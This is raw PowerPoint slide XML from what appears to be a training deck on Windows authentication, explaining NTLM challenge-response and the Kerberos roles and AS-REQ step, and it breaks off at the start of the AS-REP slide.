                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A48E2E4D-31C7-438B-82B5-CEE06BC861C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3966965" y="3651201"/>
              <a:ext cx="5096267" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Client encrypts nonce with </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NTHash</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> of password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Arrow: Right 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F66F429-BB97-4790-9ABE-5F38F8CFA479}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="9029326">
              <a:off x="7842773" y="4711338"/>
              <a:ext cx="1947503" cy="276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A29C7CC-E297-4711-AC7D-E7511C3DA140}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6544150" y="4241540"/>
              <a:ext cx="2974409" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Server sends username and response to DC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Arrow: Right 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CF1AD5-40F4-4A1B-8AC0-724E761F4895}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19831992">
              <a:off x="8089481" y="5046160"/>
              <a:ext cx="1947503" cy="276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B81A3D0-5172-412A-BB94-2F4E5505EA68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9063232" y="5261937"/>
              <a:ext cx="2974409" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DC obtains user hash from store, encrypts nonce itself and compares result</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC468A6-3EAB-475B-AC63-56DDB29E9282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8325844" y="3286099"/>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24" name="Oval 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581E73C0-3E05-47BB-8D6A-83FD8F245CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516270" y="2773342"/>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25" name="Oval 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A52FD2-9F1F-43A2-841B-05C61E0DCC92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476676" y="3768578"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A57923-B14A-45CD-8E54-01FCAE2621FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8669683" y="4114572"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Oval 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7276F169-9E54-449D-AA02-411C0A3A8352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7292761" y="5392367"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3302140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8B8E4-5EB5-47EE-BF21-E5A6317E0C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>272</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A6D5EF-66DD-4C28-A5A6-F164D8A311A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51546644-5180-49BB-92FC-FBB1184AA25B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket-based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Players:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Controller – Key Distribution Center (KDC) / Authentication Server (AS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket Granting Ticket (TGT) – First stage ticket that will enable subsequent access requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket Granting Service (TGS) – Governs actual authentication tickets to resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KRBTGT – A special account that underpins the TGT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8452062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A0CD6-938D-48FA-B700-88D60ADA5280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>273</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 1 – AS-REQ (Authentication Service Request)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFE76A3-7D4E-42A8-9B34-C18DE4AAABFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322765" y="1253134"/>
            <a:ext cx="11445563" cy="3234837"/>
            <a:chOff x="322765" y="1748434"/>
            <a:chExt cx="11445563" cy="3234837"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Arrow: Right 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D810250C-9DE1-483A-8B02-7F4E15E8EF42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2780449" y="3141775"/>
              <a:ext cx="6877901" cy="1005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TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{781C6B9E-73B9-4DB0-AF0B-50A68F86980F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462337" y="2305615"/>
              <a:ext cx="5267325" cy="2677656"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="63500">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:sp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algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SPN </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>krbtgt</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>User nonce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5EDCE6-C4E6-4B97-BC52-45387AFFA1D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4669965" y="2429313"/>
              <a:ext cx="2852063" cy="830997"/>
              <a:chOff x="4669965" y="2429313"/>
              <a:chExt cx="2852063" cy="830997"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64E1628-D8F6-4377-968C-967AE47DEA5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5247946" y="2429313"/>
                <a:ext cx="1696105" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Timestamp</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5C5571-EA33-46DD-9CD9-582F0D8444AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669965" y="2890978"/>
                <a:ext cx="2852063" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with User Hash</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E536C8-1B90-4D0F-BE91-7301CD7B674C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5216592" y="1748434"/>
              <a:ext cx="1758815" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS-REQ</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C35598-BEBC-4EEF-BAD0-69C2C5A0890E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="322765" y="2539262"/>
              <a:ext cx="2246768" cy="2332493"/>
              <a:chOff x="563984" y="2305616"/>
              <a:chExt cx="2246768" cy="2332493"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Graphic 5" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76019EE1-A747-4E35-91AE-62AD8BEF5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984" y="2305616"/>
                <a:ext cx="2246768" cy="2246768"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0448280D-0A73-4959-990C-3326068B605E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1300082" y="4268777"/>
                <a:ext cx="774571" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Client</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F70B42-CD94-42DA-8700-543EF2A1D6C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9524344" y="2465846"/>
              <a:ext cx="2243984" cy="2405909"/>
              <a:chOff x="9452716" y="2308400"/>
              <a:chExt cx="2243984" cy="2405909"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Graphic 6" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F881537-E5A7-499B-B350-810C3B367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716" y="2308400"/>
                <a:ext cx="2243984" cy="2243984"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="TextBox 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3200B4-E405-491A-968E-C77D3C38FF09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10238718" y="4344977"/>
                <a:ext cx="671979" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>KDC</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFC21F0-2511-4CB1-B6D0-742AD8B29F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4877051"/>
            <a:ext cx="11338560" cy="1455630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very time sensitive – if decrypted timestamp is outside 5 minutes, rejected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDC uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTDS.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file to get the user hash and tries to decrypt the timestamp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10977684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A0CD6-938D-48FA-B700-88D60ADA5280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>274</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 2 – AS-REP (Authentication Service Response)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC4B06A-B102-4C8E-B232-06BF4055670C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322765" y="1357909"/>
            <a:ext cx="11445563" cy="3308587"/>
            <a:chOff x="322765" y="1748434"/>
            <a:chExt cx="11445563" cy="3308587"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
